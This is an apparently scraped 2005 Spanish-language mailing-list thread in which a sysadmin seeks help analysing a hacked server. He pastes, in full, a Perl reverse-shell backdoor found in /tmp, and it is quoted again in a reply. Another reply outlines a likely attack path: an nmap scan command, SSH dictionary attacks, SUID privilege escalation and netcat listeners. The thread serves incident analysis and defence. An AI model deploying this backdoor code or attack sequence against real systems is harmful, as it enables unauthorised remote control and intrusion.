Administrador de Sistemas > http://www.eureka-linux.com.ar > > > -BEGIN PGP SIGNATURE- > Version: GnuPG v1.4.1 (GNU/Linux) > > iD8DBQFCqcSzkw12RhFuGy4RAnKHAJ4ujgjwVWJMWRR6CHi7wzHKZ/33dQCePD4P > 5vvvpYMiqb7AVNXNUepXBBs= > =RIz4 > -END PGP SIGNATURE- > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Opiniones ?... Seguridad/hacking-.
Hola. Bueno, primero que todo mi sentido pesame por tu servidor espero que renasca de las cenizas y sea mejor que antes :) ok, iniciemos, voy a plantear una posibilidad de lo que sucedio en tu servidor. el atacante lo primero que realizo fue un scaneo de puertos desde alguna maquina remota que tal vez ya estaba comprometida o que tal vez era su maquina real o un proxy... no sabemos miro los puertos nmap -sS -sV -O -v -P0 tuip con esto consiguio pasarte por encima de tu firewall si lo tenias y obtener una lista de los puertos abiertos de tu servidor junto con las versiones de los demonios que ellos corrian. ya teniendo esto y observando que tenias el ftp y sshd abiertos la tarea que le sigue es buscar en la pagina en internet o en google buscando correos electronicos por ejemplo [EMAIL PROTECTED] ...bueno, teniendo estas cuentas y siendo obtimistas de que en tu servidor creaste usuarios reales en el sistema y no en una base de datos y que a ellos le colocaste en la shell /bin/bash en vez de de /bin/false... el atacante inicia en la busqueda de un exploit para tus demonios, si no lo encuentra entonces iniciara un ataque de diccionario sobre tus servicios, creo que inicio por el sshd... suponiendo que despues de varias horas de intentar obtuvo una entrada a tu sistema por medio de un usuariohttp://www.google.com.co/ con una muy mala contraseña... luego el atacante ya tiene una shell e inicia en la busqueda de errores internos en busqueda de una escalada de privilegios, puede buscar programas con SUID o detenerse y observar en securityfocus.com cientos de errores de seguridad que puede contener tu sistema. Suponiendo de despues de varias horas escaneando tu sistema por dentro y teniendo un exploit local consiguio acceso al root... despues de este punto tu maquina ya esta perdida y no hace falta imaginarnos que podria hacer con este poder!!! El script en perl que nombras es muy sencillo. el recive dos parametros que son los siguiente el nombre del host y su ip envia una peticion a dicho puerto de el nombre de la maquina y una shell claro que este script no funciona para nada si antes inicialisaste un puerto con shell... me explico: esto se haria por ejemplo con netcat, este permite crear un demonio que escuche determonado puerto y que cuando el se conecte le sirva un determinado archivo, ejemplo /bin/sh entonces el atacante ejecuta el guion en perl para conectarse a otra maquina objetivo conclusion: utiliso tu maquina como puente para atacar otras redes. claro que podria suponer que es muy novato o un scriptkid ya que destruyo tu sistema... yo permaneceria con una cuenta privilegiada en tu sistema :) Bueno, creo que eso es todo por el momento... si seme ocurre algomas estare escribiendo Saludos. El día 10/06/05, Nelson <[EMAIL PROTECTED]> escribió: Hola me dirijo a ustedes ya que necesito intentar rehacer una escena delcrimen contra un servidor que fue hackeado :-(en primera instancia puedo creer que el ataque fue hecho via web ya quela maquina en si.. no tiene contacto fisico alguno con el exterior a escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales enchroot).el sintoma fue claro.. de un 2 por 3 se calleron los servicios de webbases de datos ssh y el equipo se colgo..fue una gran sorpresa al darme cuenta que cuando inicie la makina en modo rescate /var estaba vacio practicamente piendo en un rm-rf /var :-(... por ende.. no tengo logs para buscar algun tipo deatake.. pero buscando en /tmp encontre algo interezante un archivollamado _conex.pl_ cuyo contenido muestro aqui.--C O D E-#!/usr/bin/perl# Remote Connect-Back Backdoor Shell v1.0.# (c)AresU 2004# 1ndonesia Security Team (1st)# AresU[at]bosen.net # Usage:# 1) Listen port to received shell prompt using NetCat on your toolbox,for example: nc -l -p 9000# 2) Remote Command Execution your BackDoor Shell, for example: perlconnect.pl # # The supplied exploit code is not to be used for malicious purpose, butfor educational purpose only. The Authors and 1ndonesian Security TeamWILL NOT responsible for anything happened by the couse of using all information on these website.# -use Socket;$pamer="(c)AresU Connect-Back Backdoor Shell v1.0\n1ndonesia SecurityTeam (1st)\n\n";$cmd= "lpd";$system= 'echo "`uname -a`";echo "`id`";/bin/sh'; $0=$cmd;$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET");print STDOUT $pamer;system($system);close(STDIN);close(STDOUT);close(STDERR);--F I N C O D E-y me dije que diablos !!!... entonces.. me decidi a preguntar a la lista por si alguien mas o menosentiende este script o podria decir como funciona.. para tomarprecauciones en la proxima reinstalacio
Re: Opiniones ?... Seguridad/hacking-.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Nelson wrote: > Hola me dirijo a ustedes ya que necesito intentar rehacer una escena del > crimen contra un servidor que fue hackeado :-( Distribucion? Kernel?Firewall? Paquetes instalados? Servicios que corria? > en primera instancia puedo creer que el ataque fue hecho via web ya que > la maquina en si.. no tiene contacto fisico alguno con el exterior a > escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en > chroot). Usuarios virtuales en chroot: podrias ampliarnos el concepto? Los paquetes instalados eran todos de repositorios oficiales? > el sintoma fue claro.. de un 2 por 3 se calleron los servicios de web > bases de datos ssh y el equipo se colgo.. > > fue una gran sorpresa al darme cuenta que cuando inicie la makina en > modo rescate /var estaba vacio practicamente piendo en un rm > -rf /var :-(... por ende.. no tengo logs para buscar algun tipo de > atake.. pero buscando en /tmp encontre algo interezante un archivo > llamado _conex.pl_ > > cuyo contenido muestro aqui. > > [Codigo perl de una puerta trasera] Lo que entiendo es que te instalaron y ejecutaron un programa para abrir una puerta traseracon exito. Lo que no me queda claro es si para acceder a tu host explotó alguna vuln o lo hizo desde dentro...en tal caso...como entro? Saludos > y me dije que diablos !!!... > entonces.. me decidi a preguntar a la lista por si alguien mas o menos > entiende este script o podria decir como funciona.. para tomar > precauciones en la proxima reinstalacion del servidor. y asi protejer > mejor los servicios. y claro esta.. asi todos aprendemos un poquito > mas de seguridad que es tan importante. > Ojala alguien pueda acalrar un poco mi Duda y asi poder entregar un > informe claro y Tecnico de lo sucedido aqui. > > Atentamente > Nelson Lopez. > > - -- Ricardo A.Frydman Consultor en Tecnología Open Source Administrador de Sistemas http://www.eureka-linux.com.ar -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFCqcSzkw12RhFuGy4RAnKHAJ4ujgjwVWJMWRR6CHi7wzHKZ/33dQCePD4P 5vvvpYMiqb7AVNXNUepXBBs= =RIz4 -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Opiniones ?... Seguridad/hacking-.
Hola me dirijo a ustedes ya que necesito intentar rehacer una escena del crimen contra un servidor que fue hackeado :-( en primera instancia puedo creer que el ataque fue hecho via web ya que la maquina en si.. no tiene contacto fisico alguno con el exterior a escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en chroot). el sintoma fue claro.. de un 2 por 3 se calleron los servicios de web bases de datos ssh y el equipo se colgo.. fue una gran sorpresa al darme cuenta que cuando inicie la makina en modo rescate /var estaba vacio practicamente piendo en un rm -rf /var :-(... por ende.. no tengo logs para buscar algun tipo de atake.. pero buscando en /tmp encontre algo interezante un archivo llamado _conex.pl_ cuyo contenido muestro aqui. --C O D E- #!/usr/bin/perl # Remote Connect-Back Backdoor Shell v1.0. # (c)AresU 2004 # 1ndonesia Security Team (1st) # AresU[at]bosen.net # Usage: # 1) Listen port to received shell prompt using NetCat on your toolbox, for example: nc -l -p 9000 # 2) Remote Command Execution your BackDoor Shell, for example: perl connect.pl # # The supplied exploit code is not to be used for malicious purpose, but for educational purpose only. The Authors and 1ndonesian Security Team WILL NOT responsible for anything happened by the couse of using all information on these website. # - use Socket; $pamer="(c)AresU Connect-Back Backdoor Shell v1.0\n1ndonesia Security Team (1st)\n\n"; $cmd= "lpd"; $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); print STDOUT $pamer; system($system); close(STDIN); close(STDOUT); close(STDERR); --F I N C O D E- y me dije que diablos !!!... entonces.. me decidi a preguntar a la lista por si alguien mas o menos entiende este script o podria decir como funciona.. para tomar precauciones en la proxima reinstalacion del servidor. y asi protejer mejor los servicios. y claro esta.. asi todos aprendemos un poquito mas de seguridad que es tan importante. Ojala alguien pueda acalrar un poco mi Duda y asi poder entregar un informe claro y Tecnico de lo sucedido aqui. Atentamente Nelson Lopez. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]